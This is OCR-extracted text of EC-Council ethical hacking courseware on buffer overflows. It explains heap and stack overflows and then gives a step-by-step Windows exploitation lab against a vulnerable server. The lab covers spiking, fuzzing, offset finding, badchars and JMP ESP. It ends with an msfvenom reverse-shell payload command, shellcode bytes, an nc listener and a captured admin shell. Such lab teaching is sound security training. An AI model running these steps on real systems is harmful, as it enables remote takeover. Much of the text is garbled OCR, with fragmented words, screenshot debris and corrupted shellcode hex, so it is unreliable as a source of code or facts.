A heap is used for dynamic memory allocation. Heap memory is dynamically allocated at run time during the execution of the program, and it stores the program data. Accessing heap memory is slower than accessing stack memory. The allocation and deallocation of heap memory is not performed automatically. Programmers must write code for the allocation [malloc()] of heap memory, and after the execution is complete, they must deallocate the memory using functions such as free(). Heap-based overflow occurs when a block of memory is allocated to a heap and data is written without any bound checking. This vulnerability leads to overwriting links to dynamic memory allocation (dynamic object pointers), heap headers, heap-based data, virtual function tables, etc. Attackers exploit heap-based buffer overflow to take control of the program’s execution. Buffer overflows commonly occur in the heap memory space, and exploitation of these bugs is different from that of stack-based buffer overflows. Heap overflows have been prominently discovered as software security bugs. Unlike stack overflows, heap overflows are inconsistent and have varying exploitation techniques. } input=malloc(20);
} output=malloc(20);
} input=malloc(20);
£ output=malloc(20);
Heap: After Overflow Figure 6.44: Demonstration of heap-based buffer overflow
Module 06 Page 660
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Simple Buffer Overflow in C
CEH
Example of Stack-Based Overflow
Example of Heap-Based Overflow
Simple Buffer Overflow in C The examples overflow:
shown
in the
screenshots
demonstrate
stack-based
and
heap-based
buffer
Stack_BufferOverflow.c
int
er(char char bu trcpy(buff,
return int
n(int
C v Tab Width:
4 v
Figure 6.45: Screenshot of C program demonstrating stack-based buffer overflow Module 06 Page 661
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
ar
Termina attacke
$gcc attack
Stack
egmentation
rr
BufferOverfl rrot Desk
fault
print printf ( printf
Cv
Tab Width:
4 v
Ln 14, Col2
Figure 6.47: Screenshot of C program demonstrating heap-based buffer overflow
rch
attacker@parrot $gcc Heap Overflow.c attacker@parrot i $./a.out AAAAAAAAAAAAAAAAAAAAAAAAAABPAAAAAAAAABA |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Figure 6.48: Screenshot showing the output of heap-based buffer overflow
Module 06 Page 662
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation
CE H
fen]
Identify bad characters
~3]
Steps involved in exploiting Windows based buffer overflow vulnerability:
B
Perform spiking
Bs
Perform fuzzing
Identify the right module
R
centity the offset
Generate shellcode
Overwrite the EIP register
Gain root access
Copyright © by
Windows Buffer Overflow Exploitation (Cont’d)
iy Prohibited.
CE H
Perform Spiking | spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server in order to make it crash @ Spiking helps attackers to identify buffer overflow vulnerabilities in the target applications © Step 1: Establish a connection with the vulnerable server using Netcat
© Step 2: Generate spike templates and perform spiking
Copyright © by
Module 06 Page 663
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation (Cont’d)
CE H
AX, ESP, EBP, EIPregistersare ‘overaritten with ASC value “A”
Immunty Debuggershowing ‘wnerable server paused dueto ‘access violation
iy Prohibited.
Windows Buffer Overflow Exploitation (Cont’d)
CEH
Perform Fuzzing @
Attackers use fuzzing to send a large amount of data to the target server so that it experiences
buffer overflow and overwrites the EIP register ‘@
Fuzzing helps in identifying the number of bytes
‘@
This information helps in determining the exact location of the EIP register, which further helps
required to crash the target server
in injecting malicious shellcode
[@=) |
Module 06 Page 664
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation (Cont’d)
CE H
Copyright © by EC-Councl Al Rights Reserved Reproduction i Strictly Prohibited.
Windows Buffer Overflow Exploitation (Cont’d)
CE H
Identify the Offset
@ Attackers use the Metasploit framework pattern_create and pattern_offset ruby tools to identify the offset and exact location where the EIP register is being overwritten
Copyright © by EC-Councl. Al RightsReserved. Reproduction is St
Module 06 Page 665
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation (Cont’d)
CE H
TTL Ea TTR NES
overwritten EP register with randombytes
Ss WHAT Wa oHSGHE Lng” CSHCES971 =u SHIFEVP7 774797 Ga pan OHA Copyright © by
iy Prohibited.
CEH
Windows Buffer Overflow Exploitation (Cont’d) Overwrite the EIP Register
@ Overwriting the EIP register allows attackers to identify whether the EIP register can be controlled and can be overwritten with malicious shellcode
001011) 101110
Copyright © by
Module 06 Page 666
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Windows
Exam 312-50 Certified Ethical Hacker
Buffer Overflow Exploitation (Cont’d) emtwhcPkber
Observe the IP register ‘overwritten with fourD (asc value: 44)
Copyright © by
Windows
Al Rights Reserved. Reproduction i Strity Prohibited.
Buffer Overflow Exploitation (Cont’d)
CEH
Identify Bad Characters
@ Before injecting the shellcode into the EIP register, attackers identify bad characters that may cause issues in the shellcode @
nies
a
ae
You can obtain the badchars
through a Google search. Characters such as no byte, ie., “\x00”, are badchars
Module 06 Page 667
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation (Cont’d)
CEH
Identify the Right Module ca
@ In this step, attackers
identify the right module of the vulnerable server
Il Opens_Wndor Hp
a lemtwiePE ber
that
@ In Immunity Debugger, you can use scripts such as to identify modules that lack memory protection
Theres nomenory rotation
Windows Buffer Overflow Exploitation (Cont'd) Jt)
x 9)
ME
CEH
A lemewhePkbzr
‘winerablemodule Hex codefor JMPESP command Imone finds eixet™ ms esstune
Module 06 Page 668
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Windows Buffer Overflow Exploitation (Cont’d) 4 ety Debug ene [CPU OTM AXON Wl
CE H
ce ete Lemtwh oPR ber
(W244) ResaleRE AE wEaFane-C2SWESA
aaa Copyright © by EC-Counell Al Rights Reserved Reproduction i Strictly Prohibited.
Windows Buffer Overflow Exploitation (Cont’d)
CE H
Generate Shellcode and Gain Shell Access
@ Attackers use the msfvenom command to generate the shellcode and inject it into the EIP register to gain shell access to the target vulnerable server
\xS1 x61\xb2\349\47 1 x60 X16 Copyright © by EC-Councl. Al RightsReserved. Reproduction is St
Windows Buffer Overflow Exploitation Exploiting Windows-based buffer overflow vulnerability involves the following steps: =
Perform spiking
=
Perform fuzzing
=
Identify the offset
Module 06 Page 669
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
=
Overwrite the EIP register
=
Identify bad characters
=
Identify the right module
=
Generate shellcode
=
Gain root access
Before executing the following steps, you must install and run a vulnerable server on the victim’s machine, then run Immunity Debugger, and finally attach the vulnerable server to the debugger. Perform Spiking Spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server to make it crash. It helps attackers to identify buffer overflow vulnerabilities in the target applications. The following steps are involved in spiking: =
Step - 1: Establish a connection with the vulnerable server using Netcat As shown in the screenshot below, you can use the following Netcat command to establish a connection with the target vulnerable server and identify the services or functions provided by the server. ne
-nv
Figure 6.49: Screenshot of Netcat Module 06 Page 670
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Step - 2: Generate spike templates and perform spiking Spike templates define the package formats used for communicating with the vulnerable server. They are useful for testing and identifying functions vulnerable to buffer overflow exploitation. Use the following spike template for spiking on the STATS function:
Text »_Tab Width: 4 v Figure 6.50: Screenshot showing STATS spike template
Now, send the packages to the vulnerable server using the following command: generic_send_tcp
spike_script
SKIPVAR
SKIPSTR
n
send tcp 10,10,1,11 9999 stats. spk @
jumber of Strings is 681
able 0:0 ‘ad=Welcome to Vulnerable Server! Enter HELP for hi ariable 0:1 to Vulnerable Server! Enter HELP for help
ng iable ng ble ‘ome to Vulnerable Server! Enter HELP for help 45
Figure 6.51: Screenshot showing the output of spiking vulnerable server
Module 06 Page 671
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
-
module ntail] - [CPU - thread 0000TEFO, & Immunity Debugger - vulnserver.exe
TBI Ee View Debug Plugins Sw
«x >|
Immlib Options Window Help Jobs Jol
x
o
lemtwh?ePkbz1 = .s
x
|
fo PTR Oss CEDI+2EC2
Immunity Debugger showing running status of vulnerable server New thread with ID 09000918 created
Running
Figure 6.52: Screenshot of Immunity Debugger As we have identified that the STATS function is not vulnerable to buffer overflow, we repeat the same process for the TRUN function. Use the following spike template for spiking on the TRUN function:
HO B trunspk x
PlainText v_Tab Width: 4 v
Ln3, Col 24
Figure 6.53: Screenshot showing TRUN spike template
Module 06 Page 672
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Now, send the packages to the vulnerable server using the following command: generic_send_tcp
spike_script
SKIPVAR
SKIPSTR
ee
File
tc
Edit
ch
Terminal
9
1.spk
0 0 - Parr
Help
line read=Welcome to Vulnerable Fuzzing Variable 0:1301 Ac
0.1.1
Server!
Enter
HELP
for
help
for
help
7
]-[
#pluma
@parrot
trun.spk
Gparrot Total
jeneric
Number
Fuzzing
send
of
tcp
Strings
Fuzzing
Variable
0:0
Fuzzing
Variable
0:1
line read=We e Variables 0 Fuzzing Variable 0
Variable
is
681
to Vulnerable
9999
Server!
trun.spk
Enter
0
HELP
6
5
Fuzzing Variable Variables 21
Fuzzing Variable ‘iablesize= 3
0:
Fuzzing
Variable
0
Variable
0
Fuzzing Variable Variables 45 Fuzzing Variable
0 0:
Fuzzing
0:
Fuzzing Variable \Variablesize: \Variab Fuzzing
10.10.1.11
\Variablesize=
©
49
Variable
Figure 6.54: Screenshot showing the output of spiking vulnerable server As shown in the screenshot, the TRUN function of the vulnerable server has buffer overflow vulnerability. Spiking this function overwrites stack registers such as EAX, ESP, EBP, and EIP. If attackers can overwrite the EIP register, they can gain shell access to the
target system.
Module 06 Page 673
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
& immunity Debugger -vulnzerverexe- [CPU thread 0 02C7C] Getic Debug Plugins Immlib Options Window Help Jobs Wael lemtwhePkbzr
o
x
EAX, ESP, EBP, EIP registers are overwritten with ASCII value “A”
Immunity Debugger showing vulnerable server paused due to access violation
TOSTAVTAUY Weceas_oLoTat Ton when executing TAUTAaLT — use ShFETPIZPU7EY Eo pass exception to progran
Figure 6.55: Screenshot of Immunity Debugger showing buffer overflow vulnerability Perform Fuzzing After identifying the buffer overflow vulnerability in the target server, we must perform fuzzing. Attackers use fuzzing to send a large amount of data to the target server so that it experiences buffer overflow and overwrites the EIP register. Fuzzing helps in identifying the number of bytes required to crash the target server. This information helps in determining the exact location of the EIP register, which further helps in injecting malicious shellcode. For example, the perform fuzzing:
screenshot
below
shows
the
sample
Python
script used
by attackers
to
Figure 6.56: Screenshot showing Python script for fuzzing Module 06 Page 674
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
When you execute the above code, buff multiplies for every iteration of the while loop and sends the buff data to the vulnerable server. As shown in the screenshots, the vulnerable server crashed after receiving approximately 2300 bytes of data, but it did not overwrite the EIP register. #cd
parrot
/home/attacker/Desktop/Scripts
@parrot
#chmod
+x
fu:
Figure 6.57: Screenshot showing the output of fuzzing vulnerable server & Immunity Debugger vulnserver.exe- [CPU - thread 00000844, module vulnser] 14g Blugins Immbib
jecess violation when reading”
Se
o
=
Yo pass exception to program
x
rans
Figure 6.58: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow Identify the Offset Through fuzzing, we have understood that we can overwrite the EIP register with 1 to 2300 bytes of data. Now, we will use the following pattern_create Ruby tool to generate random bytes of data: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 3000
Module 06 Page 675
-1
Ethical Hacking and Countermeasures Copyright © by E€-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
attacker@parrot sword for
attacker
arrot
ern create. rb 1 119 Jsploit-franework/tools/exploit ‘Aaa Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbOAb1Ab2Ab3Ab4ADSADGAb7ADBADSACOACIACZAC3ACAACSACGACTACBACSAGQAIAdZAd BAd4Ad5Ad6Ad7AdBAd9AeOAc 1Ae2Ae3Ae4AeSAcGAe7ABACIATOAT LAFZAFSAT4ATSAF OAT TAF BAT IAGOAGIAGZAg3AG4Ag5AgOA
-Q7Ag8Ag9AhOAh LAh2Ah3AN4ANSANGAh7AHBANIAIOAI 1Ai2Ai 3A 4A 5A 6A 7A18A1 9A j OAj 1Aj 2A] 3Aj 4A} 5Aj 6Aj 7A} 8A} 9AKO AKIAK2AK3AK4AKSAK6AK7AKBAK9A LOAL1AL2ZAL3AL4ALSALOALTALBALSAMOAM1AMZAMZAM4AMSAMGAM7 AMBAMSANOAN1AN2ZAN3AN
4An5An6An7ANBAN9AGGAO1A02A03A04A05A06A07A0BAO9APOAp1Ap2Ap3Ap4ApSAp6Ap7ApSAp9AqOAq1AqZAq3Aq4AqSAq6Aq7A
g8Aq9ArOAr1Ar2Ar3ArdArSArGAr7ArBArSASOAS 1AS2AS3AS4ASSASOAS7ASBASOACOAtIAtZAt3AtGAtSAtGAt 7AtBAt 9AUGAUI| ‘AU2AU3AU4AUSAUGAU7AUBAUIAVOAV IAV2AVAVSAVSAVGAVTAVBAVDAWOAWLAW2AW3AW4AWSAWOAW/AWBAW9AXOAKIAX2AX3AX4A SAX6AX7AXBAX9AyOAy1AY2Ay3Ay4AySAYOAY 7Aas ;Az4A25A26A27AZ8A29Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7 Bas .a9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7BbEBbIBCOBc Hy. a 7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd58d6Bd7BdSBd9BeoBe 1Be: Be3BedBeSBe6Be7Be8Be9B0Bf 1Bf2Bf3B 4B eee Bg 1Bg2B938948958968q7B988q9Bh0Bh1Bh2Bh3Bh4Bh5B! ‘(68h7Bh8Bh9Bi 0B: 1Bi 2Bi3Bi4Bi5Bi6Bi7Bisy 1B} 5B 6B j 78] 8B j 9BkOBk1Bk2Bk3Bk4Bk5BKOBk7BKSBK9H ‘10B11812B13814B15816B17B18B19Bn0Bn1BM dow 188n9BNOBn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9B09B01B02Bo Bo4B05B06B07B08609Bp0Bp1Bp2Bp3Bp4Bp5B| 28q3Bq48q58q68q7Bq88q98rOBr 1Br2Br3Br4BrSBroBr 7Br8Br9Bs0Bs1B52Bs3Bs4B55B68s7Bs8Bs9 t6Bt7Bt8Bt 9Bu0Bu1 Bu2Bu3Bu4BuSBu6Bu7Bus6u9B VOB \v1Bv2Bv3Bv4Bv5Bv6Bv7BV8BV9BWOBW1BW2Bw: 9Bx@Bx1Bx2Bx3Bx4BXx5BX6BXx7Bx8Bx9ByOBy 1By2By3By4 E a3CadCa5Ca6Ca7CaBCa9CbOCb1Cb2Cb3Cb4cb5Cb6Cb7Cb ‘BCb9CCOCCICC2Cc3Cc4Ce5CcOCC7CcBCcICdOG bcd 7Cd8Cd9CedCelCe2Ce3CedCeSCebCe7CeBCe9CfOCf F2CF3C FAC F5CF6CF7CF8CF9Cg9Cq1C92C93C oa OCh1Ch2Ch3Ch4Ch5Ch6Ch7ChBCh9CiOCi1Ci2Ci 3CiACi (CLOCAU7CABCA9CjOCj1Cj2C} 3Cj 4Cj5Cj6Cj 7 TI K4CKSCKOCK7CkBCk9CLOCLICL2CL3CLACLSCLECL7CLECY ‘9CmOCm1Cm2Cm3Cm4Cm5Cm6Cm7CmBCm9CNOCn1Ch ACnocnocn/Cn8Cn9Co@CO1C02Co3Co4CoSCobCO7CoBCOICpACp1Cp2 p3Cp4Cp5Cp6Cp7Cp8Cp9CqaCq1CqaCq3Cq4Cq5Cq6Cq7CqaCq9CrOCr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9CsOCs1Cs2Cs3Cs4Cs5CsG Cs7CSBCs9CtOCtICtZCt3Ct4ctSCtOCt7CtECt 9CueCulCu2Cu3Cu4CuSCu6CUTCUBCUICVOCVICv2Cv3CV4CVSCv6CV7CVBCV9C ‘@Cw1Gw2Cw3Cw4 Cw5Cw6CW7CwBCW9CXOCKICX2CX3CXACXS Cx6CX7CXBCXICVOCY1Cy2Cy3CvaCySCy6Cy7CyBCy9Cz0Cz1C72¢23C Figure 6.59: Screenshot showing Metasploit pattern_create output
Run the following Python script to send these random bytes to the vulnerable server:
Figure 6.60: Screenshot of Python script sending random bytes to the server
Module 06 Page 676
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
When the above script server, which causes a register is overwritten find the offset of those & Immunity Debugger - vulnserv View Debug Plugins
is executed, random bytes of data are sent to the target vulnerable buffer overflow in the stack. The screenshot clearly shows that the EIP with random bytes. You must note down the random bytes in EIP and bytes. [CPU - threa 4] |mmlib Options Window Help Jobs fael lemtwhcPkbzr..
Buffer Overflow of Vulnerable Server has overwritten EIP register with random bytes
[06:25:54] Access violation when executing (386F4337] — use Shift*F7/F8/F9 to pass exception to progran
Figure 6.61: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow Run the following command to find the exact offset of the random bytes in the EIP register: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 3000 -q 386F4337
-1
Figure 6.62: Screenshot showing Metasploit pattern_offset output
Module 06 Page 677
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Overwrite the EIP Register As shown in the screenshot, we have identified that the EIP register is at an offset of 2003 bytes. Now, run the following Python script to check whether we can control the EIP register.
Figure 6.63: Screenshot of Python script injecting shellcode in the EIP register As shown in the screenshot, the EIP register can be controlled and overwritten with malicious shellcode. Help
Jobs
-
BEI
0
x
C208 ects and sofware assessment specialist needed
Observe the EIP registeris overwritten with four D’s (ascii value: 44)
r 1062362501 fecess Violation when executing (444444441) use ShiFE+F77PO/F9 to pass exception to progran
Figure 6.64: Screenshot of Immunity Debugger showing EIP register Module 06 Page 678
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Identify Bad Characters Before injecting the shellcode into the EIP register, you must first identify bad characters that may cause issues in the shellcode. You can obtain the badchars through a Google search. Characters such as no byte, i.e., “\x00”,
are badchars.
badchars
q"
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f£\x10\x11\x1
=
2\x13\x14\x15\x16\x17\x18\x19\x1la\x1b\x1c\x1d\xle\x1f£"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32 \x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3£\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4£\x50\x51\x52\x53 \x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5£"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72 \x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7£"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92 \x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9F" "\xa0\xal\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2 \xb3\xb4\xb5\xb6\xb7
\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2 \xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8
\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2
\x£3\xf4\x£5\xf£6\xf£7\x£8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
Next, run the following Python script to send badchars along with the shellcode:
Figure 6.65: Screenshot of Python script for sending badchars Module 06 Page 679
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
In Immunity Debugger, right-click on the ESP register value, then click on “Follow in Dump,” and finally observe the characters. You will find that there are no badchars that create problems in the shellcode. & Immunity Debugger -vulnserver.exe- [CPU - thread 00001D1C} El File View Debug Plugins Immlib Options Window Help Jobs x
DBE
Wor
lemtwhcPkbzr
[06:41:34] Access violation when executing [44444444] — use Shift*F7/F8/F9 to pass exception to progran
Figure 6.66: Screenshot of Immunity Debugger showing ESP dump Identify the Right Module In this step, we must identify the right module of the vulnerable protection. In Immunity Debugger, you can use scripts such as modules. You must download mona.py from GitHub and copy Debugger > PyCommands. Now, run the vulnerable server and Administrator, and attach the vulnerable server to the debugger.
server that lacks memory mona.py to identify such it to the path Immunity the Immunity Debugger as
In Immunity Debugger, type !mona modules in the bar at the bottom of the window. As shown in the screenshot, a pop-up window is created, which shows the protection settings of various modules.
Module 06 Page 680
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
& Immunity Debugger -vulnserver.eve- [Log data] B) File View Debug Plugins Immlib Options Window Help Jobs OPS
lemtwhePk
Ax OMAHA
M
bar.
Thereis no memory protection for the module essfunc.dll
Running
Figure 6.67: Screenshot of Immunity Debugger showing mona modules As shown in the screenshot, one of the modules, essfunc.dll, lacks memory protection. Attackers exploit such modules to inject shellcode and take full control of the EIP register. Now, run the following nasm_she11 Ruby script to convert assembly language (JMP ESP) into hex code: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
attacker@parrot S
$sudo
assword
aah
hades
for
ie py
attacker: lamar
Hex code for JMP ESP command
@parrot #7usr/share/m
S
~
amework/tools/exploit/nasm
> JMP_ESP (elelelolelololomm F FES
In
jmp
>
shell.
rb
esp
Figure 6.68: Screenshot showing Metasploit nasm_shell output Next, in Immunity Debugger, type the following command in the bar at the bottom window to determine the return address of the vulnerable module: 'mona
find
Module 06 Page 681
-s
“\xff\xe4”
-m
of the
essfunc.dll Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
& irnmunty Debugger-vulneereree [Log data] 9 Plugins _Immlib Options xd
HaHa
a
Window Help Jobs
2
emtwhcePkbzr.
Return address of the vulnerable module
Figure 6.69: Screenshot of Immunity Debugger showing return address of a vulnerable module In Immunity Debugger, select “Enter expression to follow’, enter the identified return address in the text box, click “ok”, and press “F2” to set up a breakpoint at that particular address. ao
Immunity Debugger -vunserverexe- [CPU main thread, moduleess 1
GJ file View Debug
ot
«xr
Bh
Immtib
Opti
UHRA
Go to address in Disassenblor
Help Jobs
LemtwhePkbzriws
x
2?
Paused
Figure 6.70: Screenshot of Immunity Debugger showing breakpoint at the return address Module 06 Page 682
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Now, inject the identified return address into EIP by running the following script: For example, if the return address is “625011a£”, then you must send “\xaf\x11\x50\x62”,
as the x86 architecture stores values in the Little Endian format.
Figure 6.71: Screenshot of Python script for overwriting EIP When you run the above script, you will notice that the EIP register has been overwritten with the return address of the vulnerable module: View Debug Plugins
_Immkib
8, module efune Window Help Jobs
(07:22:44 Breakpoint at esefunc.6256i10F
Figure 6.72: Screenshot of Immunity Debugger showing EIP register As shown in the screenshot, attackers can control the EIP register if the target server modules that do not have proper memory protection settings.
Module 06 Page 683
has
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Generate Shellcode and Gain Shell Access Now, run the following msfvenom command to generate the shellcode: msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread -f c -a x86 -b “\x00”
LHOST=
LPORT=
In the above command, -p > payload, LHOST > attacker’s IP, LPORT > attacker’s port, -f > filetype, -a > architecture, and —-b > bad characters
" \xedb\ xd F\ xbb\x93\x9b\x2a\xd9\xd9\ x74 \x24\ xF4\x58\x2b\xc9\xb1" \x52\x83\xcO\x04\ x31 \ x58) x13\ x03 \xcb\x88\xc8\x2c\x17\x46\xBe "\xcf\xe7\x97\xe f\x46\x02\ xa6\ x2F\ x3c\x47\x99\x9f\x36\x05\ x16" "\x6b\ x1a\xbd\xad\x19\xb3\ xb2\ x06\ x97\xe5\xfd\x97\x84\xd6\ x3c \x1b\xd7\x@a\x7e\ x25\ x18\ x5 \ x7 \x62\x45\x92\ x2d\ x3b\ x01\ x81 \XC1\x48\ x5 \xa\ x6a\ x02\ x71\x9a\ x8 \xd3\x70\ x8b\x1e\ x6f\ 2b" \\ xb \xal\xbc\x47\x02\ xb9\ xa)\x62\xdc\x32\x11\x18\ xdf\x92\ x6! *\xe1\x4c\ xdb \x43\x10\xBc\x1.c\ x63\ xcb\xfb\x54\x97\x76\xfc\xa3"
\ x5 xA10\x89\ x37 \x4d\x26\x29\ *\x3e\ x60\x57\x6f\x35\x9C\ xf "\ xd\ x64 \xd8\xd3)\xe9\x76\x "\x2d\ xcc\xSe\xb7\x39\x47\x "\xc9\x45\x9a)\xd0 \x3:4\ x66 \ "\x61\xdb\xee\XC7\x31\x73\ x
x93 \x6 f \xeb\ spenTerminat ! ia xf PIED aa
ts "\x70\x14\x16\x97\xib\xef\x|
xac\x50\x63\ x40 \ xb: RENE NEL Be\ xd8\xfd\x5c\x27 p9\ xa5\x6f\xda\x3e" \x91\xd3\x3.a\x40 1\ x49 xeb \xbb\ x6
———_Bc\x5b\xed\xfo\x1f"
\x¢7\x61\x16\x75\Xe7\x27\ xf 9\x92\ x5 f\xb8\ x24) \x94\xd4\ x4 F\xd9\ x5b\x1d\4 10\xb3\x9b\xf2\xae” \\xdb\x40\x60\x35\x1b\ x0e\x Bf\xfb\x18\x75\xde \\x55\x3e\x84\xBe\x9e\ xfa\ xf] stam 1\xcf\x6\x13\xef” "\xd0\x02\x47\xbf\x86\xdc\x! b\xd3\x2e\x79\x7b" \xa5\x1c\xba\xfd\xaa\ x48\ x4c\ xe1\x1b\x25\x09\ x1e\ x93\ xal\x9d" *\x67\\xc9\ x51\x01\xb2\x49\x71\ x80\ x16) xa4\x1a\x1d\xf3\x05\x47" \xSe\x2e\x49\x7e\ x1d\ xda\ x32\x85\x3d \xaf\x37\xcl\xf9\x5c\xda "\x5a\x6c\x62\xf9\x5b\xa5’
Figure 6.73: Screenshot showing the output of msfvenom
Now, run the following Python script to inject the generated shellcode into the EIP register and gain shell access to the target vulnerable server:
Figure 6.74: Screenshot of Python script for overwriting EIP
Module 06 Page 684
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Before running the above script, run the following Netcat command to listen on port 4444: ne
-nvlp
4444
Search
$sudo
[sudo]
T
2r@par su
password @parrot #cd
attacker:
for
@parrot
-nvlp 4444 on [any] 4444
#nc listening
Figure 6.75: Screenshot of Netcat Next, run the above Python script to gain shell access to the target vulnerable server:
@parrot d
parrot
nvlp 4444
listening on [any] 4444 connect to [10.10.1.13]
Microsoft (c)
IE:
Windows
Microsoft
from
[Version
Corporation.
\CEH-Tools\CEHv12
iwhoami
(UNKNOWN)
[10.10.1.11]
10.0.22000.469]
All
rights
50825
reserved
Module
06
System
Hacking\Buffer
Overflow
Tools\vulnserver>whoami
Module
06 System
Hacking\Buffer
Overflow
Tools\vulnserver>{]
indows11\admin
IE:
\CEH-Tools\CEHv12
Figure 6.76: Screenshot showing remote access to Admin account
